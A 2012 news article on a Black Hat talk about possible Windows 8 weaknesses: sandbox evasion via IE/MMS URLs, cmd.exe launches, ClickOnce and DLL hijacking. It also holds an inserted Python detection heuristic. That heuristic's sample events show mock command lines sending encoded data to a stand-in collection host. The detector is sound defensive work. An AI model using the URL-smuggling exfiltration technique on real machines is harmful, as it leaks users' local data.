Researcher Demonstrates Promising Ways to Attack Windows 8

Tim Greene July 30, 2012
Windows 8 has soft spots where attackers could apply pressure, researcher says.

Windows 8 offers some promising opportunities for attackers, but overall is a much more secure operating system than its predecessor, a researcher told the Black Hat conference.

There are at least three attack points in Windows 8 that with more work might yield vulnerabilities that could be exploited, says Sung-ting Tsai, leader of an advanced threat research team for Trend Micro, who was interviewed for this story after his Black Hat presentation.

But more promising are two methods of evading some security provisions Microsoft has put in place with its new operating system.

The first of these is getting around limitations placed on Windows 8 Metro style applications that prevent them from accessing the Internet. Rather than trying to break through that restriction, an application could instead access an application that has such permission.

So an application that lacks an Internet permission could still send messages to the Internet via Internet Explorer or Microsoft Media Server and append local information to the URL that IE or MMS is instructed to seek, he says. Similarly, a Word or Excel file that the Metro app accesses could contain code to connect to the Internet.

With Internet access, a rogue app could upload data from the local machine to a machine on the Internet controlled by an attacker.

Microsoft says it won't do anything about this, according to the company response Tsai includes in his Black Hat presentation. That's because accessing the Internet would be visible to users, who could stop it if they disapproved. Similarly, antivirus products could catch such access. Once this type of activity is reported to Microsoft, it could remove the app from user machines.

Tsai says he disagrees. When the average user sees a Metro app launch MMS, it won't raise suspicion that the application is trying to access the Internet, he says. But even if the user is aware, it is difficult to determine whether the access is normal or malicious behavior. Antivirus software would have similar difficulty telling the difference, he says.
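A triage heuristic for the delegated-launch pattern described above, added here as an example and not taken from the article or from Tsai's presentation. The event field names, the watch list, the thresholds and the sample events are all assumptions constructed for illustration, and a finding is a candidate for review rather than a verdict, since the same launch can be legitimate.

```python
import math
import ntpath
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Assumptions, not from the article: event field names, watch list, thresholds.
DELEGATES = {"iexplore.exe"}   # programs an app can hand a URL to; extend as needed
MAX_VALUE_LEN = 64             # longest query value treated as ordinary
MIN_ENTROPY = 4.0              # bits/char at which a value looks encoded

def entropy(s):
    """Shannon entropy of s in bits per character."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def triage(event):
    """Return reasons a process-creation event deserves review (empty list if none)."""
    if ntpath.basename(event["image"]).lower() not in DELEGATES:
        return []
    if not event["parent_in_appcontainer"]:
        return []
    reasons = []
    for url in re.findall(r'https?://[^\s"]+', event["cmdline"]):
        for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            if len(value) > MAX_VALUE_LEN:
                reasons.append(f"{key}: {len(value)}-char value")
            elif len(value) >= 16 and entropy(value) >= MIN_ENTROPY:
                reasons.append(f"{key}: high-entropy value")
    return reasons

IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
# Constructed sample events; hosts and values are made up.
SAMPLE_EVENTS = [
    {"image": IE, "parent_in_appcontainer": True,
     "cmdline": f'"{IE}" https://help.example/faq?topic=printing&lang=en'},
    {"image": IE, "parent_in_appcontainer": True,
     "cmdline": f'"{IE}" http://collect.example/p?d=' + "QUJD" * 20},
    {"image": IE, "parent_in_appcontainer": True,
     "cmdline": f'"{IE}" http://collect.example/p?k=0123456789abcdefghijklmnopqrstuv'},
    {"image": IE, "parent_in_appcontainer": False,
     "cmdline": f'"{IE}" http://collect.example/p?d=' + "QUJD" * 20},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev) or "no finding", "|", ev["cmdline"][-40:])
```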

Another possible evasion calls for using the command prompt cmd.exe from within the application container sandbox to trigger other executables outside, Tsai says.

Microsoft says this is not a problem and Tsai agrees. But he says that it is possible that in conjunction with other executables, it could potentially exploit other vulnerabilities.

He also looks at ClickOnce, the installation package running on Windows 8. It is possible to get it to launch files to the file system that could be harmful. Tsai says Microsoft agrees and will fix it in the next release of Windows 8.

Another possible weakness he explored is DLL hijacking -- inserting malicious code that is disguised as a DLL that an application is looking for. He says Internet Explorer tries to load some DLLs that it no longer needs. If the names of such DLLs could be found, they could be used to disguise malware that the browser would load.